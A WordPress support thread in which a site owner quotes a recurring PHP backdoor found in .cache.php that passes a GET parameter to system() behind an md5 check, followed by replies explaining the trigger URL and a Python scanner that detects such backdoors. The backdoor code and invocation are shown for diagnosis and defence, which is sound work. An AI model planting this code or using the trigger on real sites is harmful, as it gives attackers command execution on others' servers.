• Recently I’ve installed the paid premium version of MalCare to address malware infections on my site. It’s hosted through ASmallOrange with a godaddy domain…it keeps finding the same ‘infected’ file, every day. Every day it says it removes it, every day it comes back and finds it again. The file is this: (I’ve changed the actual name to MYSITEPROFILE, that’s not the name)

    /home2/MYSITEPROFILE/public_html/.cache.php

    And it tells me the issue is this:
    <?php if (substr(md5($_GET["localdate"]),0,6) == "b021c2") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>

    It claims it’s Obfuscated:PHP/suspiciousFunction.9336 (which is some type of auto-generated smaller backdoor malware.)

    I’m wondering as the MalCare premium that I’m paying for does not actually seem to be resolving the issue…

    Can I just delete the cache.php file manually from CPanel? Will that cause catastrophe? Will that solve my issue?

Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator James Huff

    (@macmanx)

    Are you using a caching plugin?

    Thread Starter theatrebloom 2086

    (@theatrebloom-2086)

    I don’t think so?

    Moderator James Huff

    (@macmanx)

    In that case, carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures and start backing up your site.

    James is right: Yes, your website is infected.

    No, deleting the file won’t solve your issue. As you say, it will come back, as long as the vulnerability that generates it is still unidentified and functional.

    Using system(…) within WP is usually not the best idea, but system($_GET[…]) is simply a backdoor and doesn’t really try to hide it.
    So a simple call of
    MYSITEPROFILE.tld?localdate=my_secret_which_matches_the_MD5_check&localtime=do@whatever@i@want
    will execute the command “do whatever i want” at system level (sic!).
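A triage check for exactly the pattern this reply describes, added here as an example and not code from the thread, from MalCare or from WordPress: it flags PHP files where a request parameter (via a tainted variable or directly) reaches a shell-execution function, and separately flags the substr(md5($_GET[...])) "password" gate. The two sample files, the temporary public_html layout built by build_demo_tree(), and the regex-based taint heuristic are all constructed for the example.

```python
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)"

# $var = ... $_GET[...];  -> $var now carries request-controlled data.
# "=(?!=)" keeps "==" comparisons from being mistaken for assignments.
ASSIGN_FROM_INPUT = re.compile(r"(\$\w+)\s*=(?!=)\s*[^;]*?" + SUPERGLOBAL + r"\s*\[")

# A shell-execution call and its argument list, e.g. @system($time);
SHELL_CALL = re.compile(
    r"@?\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(([^;]*?)\)\s*;")

# substr(md5($_GET[...]), ...) == "...": a hash-gated "password" on a request
# parameter, the access check used by the backdoor quoted in the thread.
MD5_GATE = re.compile(r"substr\s*\(\s*md5\s*\(\s*" + SUPERGLOBAL)


def scan_source(src: str) -> list[str]:
    """Return human-readable findings for one PHP source text."""
    findings = []
    tainted = {m.group(1) for m in ASSIGN_FROM_INPUT.finditer(src)}
    for m in SHELL_CALL.finditer(src):
        func, arg = m.group(1), m.group(2)
        direct = re.search(SUPERGLOBAL, arg) is not None
        via_var = any(re.search(re.escape(v) + r"\b", arg) for v in tainted)
        if direct or via_var:
            findings.append(f"{func}() runs user-controlled input: {m.group(0).strip()}")
    if MD5_GATE.search(src):
        findings.append("md5-gated request parameter (backdoor-style access check)")
    return findings


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a document root (dotfiles such as .cache.php included) and
    map each flagged PHP file, relative to root, to its findings."""
    results = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = Path(dirpath) / name
            findings = scan_source(path.read_text(errors="replace"))
            if findings:
                results[str(path.relative_to(root))] = findings
    return results


# Constructed sample: the one-line backdoor quoted in the thread, with straight quotes.
BACKDOOR_SAMPLE = (
    '<?php if (substr(md5($_GET["localdate"]),0,6) == "b021c2") '
    '{ $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>'
)

# Constructed sample: reads a request parameter and calls system() with a
# constant, so neither check should fire (no user input reaches the shell).
BENIGN_SAMPLE = (
    '<?php\n'
    '$key = md5($_GET["page"] ?? "home");\n'
    'file_put_contents(__DIR__ . "/cache/" . $key, "cached page");\n'
    'system("date");\n'
)


def build_demo_tree() -> Path:
    """Create a throwaway document root holding both samples (hypothetical layout)."""
    root = Path(tempfile.mkdtemp(prefix="public_html_"))
    (root / ".cache.php").write_text(BACKDOOR_SAMPLE)
    (root / "wp-content").mkdir()
    (root / "wp-content" / "cache-helper.php").write_text(BENIGN_SAMPLE)
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_demo_tree()).items():
        print(rel)
        for hit in hits:
            print("  -", hit)
```

Pointed at the real public_html instead of the demo tree, the scan reports only .cache.php for these two samples; a legitimate cache helper that reads $_GET but never hands it to the shell stays quiet. Because the file in the thread keeps reappearing after deletion, the useful follow-up is to note the modification time of each hit and look for what writes it (another flagged file, a cron entry, or a vulnerable plugin), which is the cleanup work the guide above covers; the regex taint check is a heuristic for triage, not a substitute for it.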
